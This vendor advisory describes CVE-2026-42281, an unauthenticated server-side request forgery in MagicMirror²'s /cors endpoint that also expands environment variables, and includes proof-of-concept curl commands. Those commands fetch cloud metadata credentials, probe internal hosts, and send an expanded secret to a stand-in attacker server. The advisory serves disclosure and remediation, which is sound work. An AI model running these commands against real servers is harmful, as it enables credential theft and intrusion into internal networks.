CVE-2026-42281

CVE-2026-42281 is a critical-severity server-side request forgery (SSRF) vulnerability in magicmirror (npm), affecting versions <= 2.35.0. It is fixed in 2.36.0.

Summary

An unauthenticated Server-Side Request Forgery (SSRF) vulnerability in the /cors endpoint allows any remote attacker to force the MagicMirror² server to perform arbitrary HTTP requests to internal networks, cloud metadata services, and localhost services. The endpoint also expands environment variable placeholders (**VAR_NAME**), enabling exfiltration of server-side secrets.

Details

The /cors endpoint in js/server_functions.js (function cors(), lines 37-78) acts as an open HTTP proxy with no authentication and no URL validation. Any user-supplied URL is fetched server-side via fetch() and the full response is returned to the caller.

Additionally, the replaceSecretPlaceholder() function (lines 21-25) expands any **VARIABLE_NAME** pattern in the URL with the corresponding process.env value before the request is made, allowing an attacker to exfiltrate environment variables (e.g. API keys, tokens, database credentials).

Vulnerable code path:

GET /cors?url=<attacker-controlled-url>
  → replaceSecretPlaceholder(url)     // expands **ENV_VAR** → process.env.ENV_VAR
  → fetch(url)                        // no validation, no blocklist
  → response returned to attacker     // full body, status, headers

Key issues:

  • No authentication required
  • No URL validation or blocklist for private/reserved IP ranges
  • No restriction on URL scheme or destination
  • Environment variable expansion in URL before fetch

PoC

Prerequisites: a running MagicMirror² instance accessible on the network (default: http://<host>:8080).

1. Basic SSRF, access cloud metadata (AWS IMDSv1):

curl "http://<target>:8080/cors?url=http://169.254.169.254/latest/meta-data/"

If the server runs on AWS EC2 without IMDSv2 enforcement, this returns instance metadata including IAM role credentials.

2. Internal network scanning:

curl "http://<target>:8080/cors?url=http://192.168.1.1/"
curl "http://<target>:8080/cors?url=http://127.0.0.1:3000/"

The attacker can probe internal services by observing response status codes and timing.

3. Environment variable exfiltration:

curl "http://<target>:8080/cors?url=http://<attacker-server>/?leak=**SECRET_API_KEY**"

The server expands **SECRET_API_KEY** to the value of process.env.SECRET_API_KEY before making the request, sending the secret to the attacker-controlled server as a query parameter.

Impact

  • Cloud deployments (AWS/GCP/Azure): full compromise of cloud instance credentials via metadata service (169.254.169.254), potentially leading to lateral movement within the cloud account
  • Internal network access: the server becomes a proxy to scan and interact with services on internal networks that are not directly reachable by the attacker
  • Secret exfiltration: environment variables containing API keys, database credentials, or other sensitive configuration are directly readable
  • Affected users: anyone running MagicMirror² exposed to an untrusted network (including LAN). The /cors endpoint requires no authentication, so any host that can reach the MagicMirror HTTP port can exploit this vulnerability

Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside. Typical impact: access to internal metadata services, internal APIs, or cloud credentials.

CVE-2026-42281 has a CVSS score of 8.6 (Critical). The vector is network-reachable and requires neither privileges nor user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (2.36.0); upgrading removes the vulnerable code path.

Affected versions

magicmirror (<= 2.35.0)

Security releases

magicmirror → 2.36.0 (npm)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.


Remediation advice

Upgrade magicmirror to 2.36.0 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-42281? CVE-2026-42281 is a critical-severity server-side request forgery (SSRF) vulnerability in magicmirror (npm), affecting versions <= 2.35.0. It is fixed in 2.36.0. Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside.
  2. How severe is CVE-2026-42281? CVE-2026-42281 has a CVSS score of 8.6 (Critical). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of magicmirror are affected by CVE-2026-42281? magicmirror (npm) versions <= 2.35.0 are affected.
  4. Is there a fix for CVE-2026-42281? Yes. CVE-2026-42281 is fixed in 2.36.0. Upgrade to this version or later.
  5. Is CVE-2026-42281 exploitable, and should I be worried? Whether CVE-2026-42281 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  6. What actually determines whether CVE-2026-42281 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-42281? Upgrade magicmirror to 2.36.0 or later.
